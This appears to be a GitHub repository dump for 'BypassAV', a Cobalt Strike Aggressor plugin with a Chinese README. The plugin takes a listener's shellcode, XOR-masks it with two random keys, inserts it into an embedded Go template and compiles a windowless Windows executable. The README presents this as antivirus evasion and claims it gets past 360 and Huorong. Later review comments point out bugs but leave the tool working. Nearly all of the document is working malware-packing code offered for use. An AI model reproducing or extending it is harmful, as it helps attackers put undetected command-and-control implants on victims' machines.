├── README.md
├── bypass.cna
└── img
    ├── 2.png
    └── 3.gif

/README.md:
--------------------------------------------------------------------------------
# 前言
仅用于技术交流,请勿用于非法用途

这个插件没有什么技术含量,旨在用于快速生成免杀的可执行文件,目前仅支持exe文件格式。需要安装go环境,因为是用`go build`生成的

免杀效果如下图:

![img](./img/2.png)

用法:导入之后,位置在:`attack` -> `BypassAV`,快捷键:`Ctrl+G`

![img](./img/3.gif)

## 2020/7/19更新

更新了弹出的黑窗口问题和Linux/Mac上不能生成问题以及修复一些bug,建议生成64位的,32位的vt上查杀有点多(不过360全家桶、火绒那些还是可以过的)

**注:** 用go打包体积可能会有点大(1.2M左右),可以用upx压缩一下,大概能压缩到600kb左右那样子
--------------------------------------------------------------------------------
/bypass.cna:
--------------------------------------------------------------------------------
# Cobalt Strike Aggressor (Sleep) script. Adds an "Attacks -> BypassAV" menu
# entry and a Ctrl+G hotkey that open a dialog, then wrap the selected
# listener's shellcode into a Go source template and compile it via
# `go generate` / `go build` (see README). A working `go` toolchain must be
# on PATH of the machine running the Cobalt Strike client; nothing below
# checks for it, and no build error is ever surfaced to the operator.

# Menu entry under the "attacks" popup; "&" marks the mnemonic key.
popup attacks{
    item("&BypassAV",{Generator();});
}

# Same action on the Ctrl+G hotkey.
bind Ctrl+G{
    Generator();
}

# Build and show the generator dialog.
# Fields: "listener" (drop-down of configured listeners, default "") and
# "bit" (checkbox, default false = 32-bit payload). The "Generate" button
# passes the field values to &build; the help button opens the project URL.
sub Generator{
    $dialog = dialog("Generator", %(listener => "" , bit => false), &build);
    drow_listener($dialog, "listener", "Listener: ");
    dialog_description($dialog, "该插件用于快速生成免杀的可执行文件");
    dbutton_action($dialog, "Generate");
    dbutton_help($dialog, "http://github.com/hack2fun/BypassAV");
    drow_checkbox($dialog, "bit", "x64: ", "使用64位的payload");
    dialog_show($dialog);
}

# Dialog callback. $3 is the map of dialog field values ("listener", "bit").
# Steps: choose the Go target arch, decode the embedded Go source template,
# substitute two random XOR key bytes and the XOR-masked shellcode, ask the
# operator for an output path, write the filled template to a fixed temp
# file and run `go generate` on it, which in turn runs `go build`.
sub build{
    # Unused: coerces the checkbox value to a string but is never read.
    $a = $3["bit"] . "";

    # Checkbox unchecked -> 32-bit shellcode and GOARCH=386;
    # checked -> 64-bit shellcode and GOARCH=amd64.
    if ($3["bit"] eq "false"){
        $system = "x86";
        $arch = "386";
    }else{
        $system = "x64";
        $arch = "amd64";
    }

    # Go source template, stored gzip+base64. Its contents are not readable
    # here; from the replace() calls below it carries the placeholders
    # ${KEY_1}, ${KEY_2}, ${shellcode} and ${GONERATE} (sic). Presumably a
    # program that unmasks and runs the byte slice — cannot be confirmed
    # from this file.
    $code = gunzip(base64_decode("H4sIAAAAAAAACr1TUW/aMBB+xr/iFiHkrFGasu2lGw+IelVVsiJg3aaKRVliqFVjR05SgRj/fecEAmzt66wots/fd77v7pzFyVO84LCMhSKkvbm++8LG/SnbkvPzhb5ccMVNXHDIH7mUhIhlpk0BlLScfJ0nsZQOLkuVx3NuV4VY4uwSkmiVV7iQhdHgLgxvpnA8ehCsLoIgqAFjNmHje/Y3oFsBRv1rFrHvbPB1yhDZv/o2vpmyCvAej2/Zj+gC/hk9aG+qo20N6b4O6W5txM+xsfE+caO4fNfdQ3Yy/bDMi6GO06vhkDp7kJ9iAlzSUgUujvy+SKpAe8a9MEUZy76UOrGMxqOlfBYqHRmdUOcYZmnjQg50tg75Ups10mqfpxzEhPqZ1xgkobZ5qZKqxNSFDWm1N1U5E51yzI4V3uzhYfZrXXDSmmsDAi4xyx9x/gSSK7rSJmqQLtrPzqy71oHdgzjLuEppY/LghPUgZj+rslT/LkrCCOI0NR5EHnBj7JXHqv0BJpIGHpRCFVlhqA3kEITrwaHDfh/1kgcv9w3eKObVRW8wfUJCp2N3PjNGG0wPWp3pIwed2cYXWkGil5nkBU8hL5OE5/m8lHLtO7X0XaXZShQ0qOVEjZYenBSs1lKrpTs9Lq1fjz/SaOCGdg65CmZW3yvC/4MQ+5r9ieQ8ox/gLdRbjk87xfM9YVLPO1lB87lk+weKv0dCXQQAAA=="));
    # Two single-byte XOR keys. NOTE(review): Sleep's rand(n) presumably
    # returns 0..n-1, so a key of 0 is possible and that key then contributes
    # nothing to the mask — confirm the range if this matters.
    $KEY_1 = rand(255);
    $KEY_2 = rand(255);
    # replace() takes a regex, hence the escaped "$", "{" and "}".
    $code = replace($code, '\$\{KEY_1\}', $KEY_1);
    $code = replace($code, '\$\{KEY_2\}', $KEY_2);
    # Raw shellcode for the chosen listener/arch from the team server. The
    # middle argument is the "staged" flag (false = stageless) according to
    # the Aggressor docs — not verifiable from this file.
    $shell_code = shellcode($3["listener"], false, $system);
    # Split into one-character strings so each byte can be masked on its own.
    $shell_code = split("",$shell_code);
    $arr = "";

    # Emit ",b0,b1,..." with every byte XORed with both keys.
    # NOTE(review): this relies on "^" binding tighter than "."; verify
    # Sleep's operator precedence, otherwise the XOR would be applied to the
    # concatenated string rather than to the byte value.
    for ($i = 0; $i < size($shell_code); $i++){
        $arr = $arr . "," .asc($shell_code[$i]) ^ $KEY_1 ^ $KEY_2;
    }

    # Go byte-slice literal; substr(..., 1, ...) drops the leading comma.
    $final_shellcode = "xor_shellcode :=[]byte" . "{" . substr($arr,1,strlen($arr)) . "}";
    $code = replace($code , '\$\{shellcode\}' , $final_shellcode);

    # Ask where to save the .exe; the callback receives the chosen path in $1.
    prompt_file_save("BypassAV.exe", {
        $path = "$1";

        # The build command is spliced into the Go source as a
        # "//go:generate -command shell ..." line, i.e. it defines a
        # go:generate alias named "shell"; the template is presumably
        # expected to invoke that alias on a following line (not visible here).
        # "-ldflags -H=windowsgui" links a GUI-subsystem .exe so no console
        # window appears (the README's "black window" fix).
        # NOTE(review): $path is interpolated into the command unquoted — a
        # save path containing spaces or shell metacharacters breaks or
        # alters the command.
        # NOTE(review): the temp file has a fixed, predictable name in a
        # shared directory (C:\windows\temp or /tmp). On a multi-user host
        # another local user could pre-create or race it between writeb()
        # and exec(), and `go generate` would then compile their source on
        # the operator's machine. The del/rm at the end only runs when the
        # build succeeds (&& chain), so on failure temp.go — containing the
        # embedded shellcode — is left on disk.
        if ("*Windows*" iswm systemProperties()["os.name"]) {
            # Doubles every backslash in the path (Sleep string escaping plus
            # regex: pattern "\\" -> replacement "\\\\"); presumably because
            # the go:generate line re-interprets backslashes — confirm.
            $path = replace($path, "\\\\", "\\\\\\\\");
            $build = "//go:generate -command shell cmd /c set GOOS=windows&& set GOARCH= $+ $arch $+ && go build -o $path -ldflags -H=windowsgui C:\\\\windows\\\\temp\\\\temp.go && del C:\\\\windows\\\\temp\\\\temp.go";
            $gofile = "C:\\\\windows\\\\temp\\\\temp.go";
            $handle = openf("> $+ $gofile");
        }else{
            # NOTE(review): in bash, "GOOS=windows&&" is a plain shell-variable
            # assignment, not an export, so it is not obviously visible to
            # the `go build` child process — verify that this branch really
            # cross-compiles (the README says Linux/Mac was fixed 2020/7/19).
            $build = "//go:generate -command shell bash -c \"GOOS=windows&& GOARCH= $+ $arch && go build -o $path -ldflags -H=windowsgui /tmp/temp.go && rm /tmp/temp.go\"";
            $gofile = "/tmp/temp.go";
            $handle = openf("> $+ $gofile");
        }

        # Placeholder name is misspelled ("GONERATE"); it must match the template.
        $code = replace($code, '\$\{GONERATE\}', $build);
        writeb($handle, $code);
        closef($handle);
        $space = " ";
        # Runs `go generate <tempfile>`. No exit status or output is checked,
        # so the message below is shown even when the build failed.
        exec("go generate $+ $space $+ $gofile");
        show_message("save to $+ $1");
    });

}
--------------------------------------------------------------------------------
/img/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hack2fun/BypassAV/0461fcd20680ea2efdfc5b96c04cc98a571e3fd8/img/2.png
--------------------------------------------------------------------------------
/img/3.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hack2fun/BypassAV/0461fcd20680ea2efdfc5b96c04cc98a571e3fd8/img/3.gif
--------------------------------------------------------------------------------